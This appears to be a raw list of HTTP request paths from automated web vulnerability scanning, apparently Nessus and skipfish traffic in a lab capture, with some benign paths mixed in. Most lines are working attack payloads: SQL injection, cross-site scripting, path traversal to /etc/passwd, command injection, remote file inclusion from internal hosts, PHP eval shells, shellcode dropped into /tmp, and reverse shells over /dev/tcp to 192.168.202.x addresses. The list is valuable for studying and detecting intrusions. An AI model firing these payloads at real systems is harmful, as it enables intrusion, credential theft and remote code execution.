content=\"testhvje=9403\">\n/main.php?stuff=';uname\\x09>q19963916\\x09#\n/zqqemp6j.php3?<script>cross_site_scripting.nasl</script>\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331904238\")</script>\n/top.php?stuff=\"rm\\x0cq97119121&rem\\x0c\n/examples/jsp/cal/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/tera patrick's - fashion underground/\n/606wkcop.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&ver,>q38169729&rem,\n/mpcgi/c32web.exe/changeadminpassword\n/main.php?stuff=\"&rm\\x0bq62577827&rem\\x0b\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q57256611&frm_user=&scr_height=&scr_width=\n/manager/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+4e+30+00+00+5e+30+00+00+00+00+00+00+4e+30+00+00++>>ctdn\n/169okeyj.pl?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/examples/jsp/jsp2/el/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/iktok2bw.cgi?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/medical-transcription/\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,371460352,0,0,0,0,0--\n/7uz3ok60.html?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/manager/index.cfm?fuseaction=category.display&category_id='\n/cacti/source?v=../../../../../../../../../../etc/passwd\\x00\n/l4fz1dqw.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/supporter/tupdate.php?groupid=change&sg='\n/scripts/wxrdqnkjuwmu.sh\n/1r8cfrlf.jspa?<script>document.cookie=\"testydan=5106;\"</script>\n/top.php?stuff=';del\\x09q14376774\\x09#\n/0rufe52p.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ywaxntrx.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/sources/functions.php?root_path=/etc/passwd\\x00\n/l13b77e5.cfc?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/nsn/..\\webdemo/env.bas\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+4d+24+03+34+9f+8b+7d+28+f3+a6+61+75+17+8b+55+f8+8b+4d+fc+66+8b+04+5a+0f+bf++>>ctdn\n/en-us/9kr0ih0v.nsf?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/top.php?stuff=ver;>q97535751&rem;\n/myevent.php?myevent_path=/etc/passwd\\x00\n/main.php?stuff='\n/cgi-home/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/phpmyadmin/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/scripts/phpsysinfo/inc/hook_admin.inc.php\n/hjdzm96v.cfm?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/examples/jsp/jsp2/jspx/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/twiki/bin/view/main/twikiusers?rev=3390 `0<&86-;exec 86<>/dev/tcp/192.168.202.118/35392;sh <&86 >&86 2>&86`#\n/7u1pb2xi.exe?<script>document.cookie=\"testlwwz=718;\"</script>\n/examples/jsp/checkbox/index.php?op=default&date=200607' union select 1,162548266,1,1,1,1,1,1,1,1--&blogid=1\n/xlj7h65o.php?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/en-us/s7qus4g3.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-914/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/zln2hm2z.x?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/top.php?stuff=1417058040' and 1=1 and ''<>'zoilnzf1\n/javascript/.htpasswd.sfish/.htaccess.aspx-->\">'>'\"<sfi000017v868621>\n/scripts/cevvxrxqxc_b.cgi\n/recordings/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/en-us/oie504mr.aspx?<script>document.cookie=\"testtpby=7052;\"</script>\n/manager/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/ghl9il??\n/javascript/progress.exe\n/scripts/formmail\n/en-us/oie504mr.exe?<script>document.cookie=\"testtpby=7052;\"</script>\n/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl?\n/examples/servlets/servlet/protection.php?action=logout&siteurl=/etc/passwd\n/examples/jsp/colors/sendcard.php?view=1&id='sendcard_sql.nasl\n/ans/ans.pl?p=../../../../../usr/bin/id|&blah\n/noprescriptionphentermine/\n/javascript/cxf.exe\n/top.php?stuff=uname >q79861172 #\n/manager/athenareg.php?pass= ;id\n/examples/jsp/jsp2/el/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/d44uk9h2.cgi?<script>document.cookie=\"testmybc=2088;\"</script>\n/yef5f3d5.fts?<script>document.cookie=\"testcrcv=6167;\"</script>\n/javascript/item.exe\n/ghswfouu.kspx?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/examples/jsp/jsp2/el/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/scripts/wxrdqnkjuwmu.cgi\n/main.php?stuff=;uname\\x09>q62126743\\x09#\n/javascript/programming.exe\n/cgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/examples/jsp/colors/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/scripts/pssdseehtgdp.sh\n/examples/jsp/cal/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331909275\n/javascript/mdb.exe\n/de3v2dd9.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/en-us/account/ovlaunch.exe\n/examples/servlets/servlet?username=\"<script>foo</script\n/script/gestion/index.php?path_inc=@rfiurl\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\\x00\n/en-us/jnv890lt.dll?<script>cross_site_scripting.nasl</script>\n/pbserver/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/x2gyorli.cgi?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/top.php?stuff='\\x0duname >q76686472 #\n/h21y8w52.dll?<script>cross_site_scripting.nasl</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/script/common.inc.php?path_inc=@rfiurl\n/b1q8bywu.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>\n/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/scripts/admin/users.php\n/quagynka.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=1985387140' and 1=1 and ''<>'bvys4izi\n/javascript/.htaccess.sfish/\"`uname`\"\n/subscriptionhomepage/\n/3j8echh0.htm?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/bn857frh.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/htpasswd.xslt\n/javascript/ms.exe\n/john battelle's searchblog/\n/s7qus4g3.htm?<script>cross_site_scripting.nasl</script>\n/scripts/c/portal/login\n/ygkjkngd.dll?<script>document.cookie=\"testnago=4518;\"</script>\n/zln2hm2z.php?<script>document.cookie=\"testblcp=8120;\"</script>\n/top.php?stuff=uname\\x09>q38266346\\x09#\n/webtop/wdk/samples/dumprequest.jsp?j=<script>alert('vulnerable');</script>f\n/copying/</p><body><script/src=\"http://www.example.com/test?rnd=q48678656\"></script><p>\n/o1zj4u9v.html?<script>document.cookie=\"testabrn=6368;\"</script>\n/javascript/.passwd.jsf\n/3m5knyc4.fts?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/examples/jsp/colors/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/qczkquis.jsp?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/bxnyrhmh.exe?<script>document.cookie=\"testmjct=1867;\"</script>\n/javascript/digg.exe\n/examples/servlets/servlet/index.php?user_langue=../../../../../../../../../../etc/passwd\n/help.php?q=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/<meta http-equiv=set-cookie content=\"testlwwz=718\">\n<meta http-equiv=set-cookie content=\"testydan=5106\">\n/j4oqyvga.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nuh3zirz.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/remindpasswd\n/examples/jsp/sessions/sources/functions.php?root_path=/etc/passwd\\x00\n/phpmyadmin/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/javascript/dialog.exe\n/examples/jsp/cal/calendar.php?serverpath=/etc/passwd\\x00\n/20040209_transcript/\n/top.php?stuff=\"ping;-w;10000;-n;1;4.3.2.1&rem;\n/manager/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/main.php?logout=&uname >q27658181 #\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331904472.php.\n/examples/jsp/jsp2/jspx/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/t578vqea.x?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/phpmyadmin/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/gw5/gwweb.exe?help=bad-request\n/main.php?logout=\"|ping;-w;9000;-n;1;4.3.2.1|rem;\n/javascript/dialogs.exe\n/scripts/help.php\n/quagynka.jsp?<script>cross_site_scripting.nasl</script>\n/edzaia0i.php?<script>cross_site_scripting.nasl</script>\n/uc3w3bdi.php3?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/ows-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/admin/admin.php?sid=0'\n/javascript/diffs.exe\n/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?\n/vmi8bb12.x?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/main.php?logout=\"rm\\x09q74671245\\x09#\n/en-us/manager/search/data/inputs/script\n/archive.php?scriptpath=http://192.168.202.96:8080/txenjrxf3??\n/scripts/buoalakxhatu.cfm\n/examples/jsp/checkbox/whois.cgi?action=load&whois=;id\n/main.php?stuff=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/subscriptionscenter/\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/txenjrxf3??\n/javascript/trees.exe\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- \n/en-us/h5sc3gxy.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/search=<script>alert('xss')</script>\n/examples/jsp/jsp2/el/showcat.php?cat=1'\n/dslpwt15.kspx?<script>document.cookie=\"testtkio=5454;\"</script>\n/examples/jsp/jsp2/jspx/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/2aibfaczmac8??\n/top.php?stuff=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/top.php?stuff=;rm\\x09q51161767\\x09#\n/fmnveedu.html?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/examples/jsp/checkbox/javascript.php?abs_path=/etc/passwd\\x00\n/e9rx3ya4.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ping,-w,11000,-n,1,4.3.2.1|rem,\n/javascript/.htpasswd.sfish/\"`uname`\"\n/examples/jsp/sessions/cal_week.php?op=week&catview=999'\n/manager/hw3.cgi?daysonly=0).system('id').(\n/main.php?logout=ver >q98354754&rem \n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/zz5thkvtmlgl??\n/gvx7m5ti.nsf?<script>document.cookie=\"testwldz=3506;\"</script>\n/cgi-bin/bsguest.cgi?email=x;ls\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/urcppbumwm0;echo|awstats447671.txt\n/crystalreportwebformviewer2/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/scripts/index.php?cat_select=<script>foo</script>\n/examples/jsp/jsp2/el/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/eei78ore.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/scripts/wspd_cgi.sh/wservice=wsbroker1/webutil/ping.p\n/scripts/verify.asp?username='\n/inc/formmail.inc.php?script_root=http://192.168.202.96:8080/txenjrxf3?\n/phpmyadmin/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm??cmd=id;pwd\n/phpmyadmin/sendcard.php?view=1&id='sendcard_sql.nasl\n/index.html?urlmaskfilter=<script>foo</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=q89818741&scr_width=\n/t7tm4m0b.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/help.php?q=\"&ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/6n7aacgg.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script11/\n/javascript/simple.exe\n/addvip.php?msetstr[\\\"progsdir\\\"]=http://cirt.net/rfiinc.txt?\n/examples/jsp/error/index.php?search=<script>foo</script>\n/help.php?q=ver\\x0b>q19552399&rem\\x0b\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8??\n/top.php?stuff=\"rm\\xa0q69465625&rem\\xa0\n/g3w7y7u5.nsf?<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/jsp/error/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/mpcgi/.htpasswd\n/b1q8bywu.php3?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q43818971&frm_user=&scr_height=&scr_width=\n/main.php?stuff='&del q78458992 #\n/j4oqyvga.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/whatisscriptingnews/\n/help.php?q=';uname\\x09>q85144243\\x09#\n/scripts/search.jsp?q=%\"<script>alert(1332010405)</script>\n/manager/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/cgi-bin/search.jsp?q=%\"<script>alert(1331904190)</script>\n/clk;38417398;7163019;r/\n/scripts/gdxlwjnlsr6i.pl\n/search.jsp?q=%\"<script>alert(1331904189)</script>\n/en-us/h5sc3gxy.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/tracks.exe\nftp://192.168.25.103/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/main.php?logout=\"&ver&rem\\x0b\n/fpnpp5zg.dll?<meta http-equiv=set-cookie content=\"testyias=101\">\n/examples/jsp/jsp2/jspx/viewpage.php?file=/etc/passwd\n/phpmyadmin//........................................................................../../../../../../../../windows/win.ini\n/ap58k3ci.php3?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testnvxc=4301;\"</script>\n/azcrfs8d.dll?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/cacti/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161\n/rv98iwjp.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/shopexd.asp?catalogid='42\n/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/javascript/listinfo.exe\n/xlj7h65o.htm?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/byrg33fw.cgi?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331923201\n/examples/jsp/jsp2/el/sendtemp.pl?templ=../../../../../etc/passwd\n/cgi-perl/testcgi.exe\n/henry d'allemagne polichinelle et son v??locip??de /\n/fa8p8lr8.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=^'\n/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/microsoft office 2007 suite's + add on programs/\n/scripts/lce0cbkfb8xx.php\n/i7prbs22.cfm?<script>document.cookie=\"testjnre=7328;\"</script>\n/examples/jsp/jsp2/el/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/cgi-bin/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini\n/subscription_promotion/\n/e9rx3ya4.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/cslivesupport.cgi?command=savesetup&setup=;system('cat /etc/passwd')\n/javascript/clicks.exe\n/mv8wxfy9.fts?<script>document.cookie=\"testrhbc=8184;\"</script>\n/scripts/story.pl?next=../../../../../etc/passwd\\x00\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010406,1,1928557356--\n/help.php?q=&del;q15387485&rem;\n/cacti/include/config_settings.php?config[include_path]=/etc/passwd\\x00\n/cgis/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/main.php?stuff=\"ping,-w,11000,-n,1,1.2.3.4&rem,\n/etree-scripts/\n/magician's/\n/examples/jsp/checkbox/direct.php?rf=/etc/passwd\\x00\n/a0imiuf1.php?<script>document.cookie=\"testxqrn=4654;\"</script>\n/phpmyadmin/kb.cgi?view='&lang=en\n/recordings/config.php?path[docroot]=/etc/passwd\\x00\n/bzuf9ozq.cgi?<script>cross_site_scripting.nasl</script>\n/azcrfs8d.html?<script>document.cookie=\"testjpdr=9205;\"</script>\n/n1afe1y6.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/lock.exe\n/search/submit.php?config[\\\"sipssys\\\"]=http://cirt.net/rfiinc.txt?\n/now that's what i call xmas - 3cd's/\n/byrg33fw.cfc?<script>document.cookie=\"testexuu=5340;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+0c+20+ae+75+e9+e2+f7+8b+73+18+8d+45+0d+50+6a+0e+e8+18+00+00+00+50+8d+45+1b++>>esbq\n/javascript/.htpasswd.sfish/9 1 -\n/scripts_1/\n/d7ktpmcq.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ydexw8by.php3?<script>document.cookie=\"testulex=4996;\"</script>\n/examples/jsp/jsp2/jspx/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/cacti/viewpage.php?file=/etc/passwd\n/rv98iwjp.kspx?<script>cross_site_scripting.nasl</script>\n/phorum/admin/footer.php?globals[message]=<script>alert('vulnerable')</script>\n/bxnyrhmh.nsf?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/cgi-bin/index.php?id=urjhxcl19w'\n/examples/jsp/checkbox/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/perl.exe?-v\n/scripts/hints.pl?|id|\n/javascript/daemon.exe\n/nmw0do67.pl?<script>cross_site_scripting.nasl</script>\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/en-us/i686v90l.nsf?<script>document.cookie=\"testfutf=1550;\"</script>\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/shell_script/\n/cgi.cgi/vssetcookie.exe\n/scripts/nbmember.cgi?cmd=test\n/help.php?q=\"\\x0drm\\x09q76412123\\x09#\n/javascript/htpasswd.php\n/scriptv0105192/\n/help.php?q=\";uname >q69686889 #\n/main.php<?eval($_post['q89188514']);?eval($_post['q89188514']);?>\n/en-us/fo564rei.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/bb-hist.sh?histfile=../../../../../etc/passwd\n/javascript/closed.exe\n/i686v90l.html?<script>document.cookie=\"testfutf=1550;\"</script>\n/mv8wxfy9.fts?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/help.php?q=\"&rm q11415113 #\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/llumt7msyau5y??&cmd=id\n/h4bi26jd.idc?<script>document.cookie=\"testhrzx=1150;\"</script>\n/help.php?q='&uname >q67988136 #\n/recordings/search/show.pl?url=file:/etc/passwd\n/help.php?q='\\x0arm\\x09q47355772\\x09#\n/169okeyj.jsp?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/inc/download_center_lite.inc.php?script_root=http://192.168.202.96:8080/txenjrxf3?\n/top.php?stuff=\"rm q61611865&rem \n/upload.php?type=\\\"<script>alert(document.cookie)</script>\n/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd\n/examples/jsp/num/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/main.php?stuff=\"&del\\xa0q65461871&rem\\xa0\n/en-us/33y9gcqq.nsf?<script>document.cookie=\"testnvxc=4301;\"</script>\n/javascript/wp-login.exe\n/mv8wxfy9.do?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>ctdn\n/aj3pf49c.aspx?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/examples/jsp/cal/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/m4kkjf8l.pl?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/examples/jsp/num/index.php?op=default&date=200607' union select 1,652029819,1,1,1,1,1,1,1,1--&blogid=1\n/b1q8bywu.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/clk;63222941;7163019;d/\n/examples/jsp/checkbox/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/en-us/account/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/javascript/meta.exe\n/phpmyadmin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/main.php?stuff=\"|ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/l4fz1dqw.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i686v90l.fts?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/miz4r5hz.pl?<script>document.cookie=\"testviqu=1270;\"</script>\n/scripts/prnnucptkixl.shtml\n/prescriptive_guide/\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,390336409--\n/examples/servlets/servlet/viewpage.php?file=/etc/passwd\n/main.php?logout=';rm\\x09q35732238\\x09#\n/h5i6crm3.php3?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/scripts/eezuu7xc7ge3.shtml\n/7uz3ok60.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fo564rei.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/en-us/oie504mr.jsp?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/recordings/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/javascript/spy.exe\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1../../../../../../../../../../tmp/writetest1351541121.txt\n/help.php?q=\"\\x0duname\\x09>q93881688\\x09#\n/main.php?logout=\"\\x0adel\\x09q43175153\\x09#\n/as_noscript/\n/european'no'tosoftwarepatentdirectiveleavesdoorsopentoprotectionofnewideas/\n/x2gyorli.php3?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/daddy's little princess/\n/d5a5renl.fts?<script>cross_site_scripting.nasl</script>\n/v3axg1p8.x?<script>document.cookie=\"testxagh=6987;\"</script>\n/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/zz5thkvtmlgl?\n//<body><script/src=\"http://www.example.com/test?rnd=q51938649\"></script>\n/b5xdqgz2.jspa?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"\\x0auname >q73214822 #\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/gjehhrjnrx0;echo|awstats193123.txt\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/yzicxmyifv0;echo|awstats535416.txt\n/scripts/cwmail.exe\n/nuh3zirz.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/main.php?stuff=ver\\x0b>q86682811&rem\\x0b\n/javascript/profiling.exe\n/main.php?stuff=\"del\\x09q23164795&rem\\x09\n/j4rdyhw8.kspx?<script>document.cookie=\"testrluj=1420;\"</script>\n/scripts/%2e./..%5cwinnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe 1ecj.exe\n/cgi-915/c32web.exe/changeadminpassword\n/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/checkbox/athenareg.php?pass= ;id\n/b5xdqgz2.x?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?op=default&date=200607' union select 1,597038072,1,1,1,1,1,1,1,1--&blogid=1\n/scs86g1p.nsf?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/tuwjta1w.php3?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/aj3pf49c.do?<script>document.cookie=\"testnofv=4170;\"</script>\n/javascript/text.exe\n/forum-ra_professionnel.asp?n=/....../boot.ini\n/modules.php?name=stories_archive&sa=show_month&year=<script>alert('vulnerable')</script>&month=3&month_l=test\n/examples/jsp/jsp2/el/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/archive.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??\n/top.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/gy23xnjq.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&ver\\x0c>q31768299&rem\\x0c\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/welwcbtdbf0;').\"]=1\n/cgi-perl/r.cgi?file=../../../../../../../../../../etc/passwd\n/javascript/more.exe\n/nyjgaorz.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/projects/1/repository/annotate?rev=`0<&200-;exec 200<>/dev/tcp/192.168.202.96/16919;sh <&200 >&200 2>&200`\n/cgi-bin/index.php?site=../../../../../../../../etc/passwd\\x00\n/addvip.php?msetstr[\\\"progsdir\\\"]=@rfiurl\n/examples/jsp/num/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/index.php?id='union/**/select/**/0,0,1649969852,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/en-us/account/htgrep/file=index.html&hdr=/etc/passwd\n/openfile.aspx?file=../../../../../../../../../../boot.ini\n/en-us/hipkz026.idc?<script>document.cookie=\"testyrbs=2855;\"</script>\n/cgi-bin/search.jsp?q=%\"<script>alert(1331904189)</script>\n/phpmyadmin/perl.exe?-v\n/<script>document.cookie=\"testnofv=4170;\"</script>\n/examples/jsp/colors/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/manager/logbook.pl?file=../../../../../../../../../../bin/cat 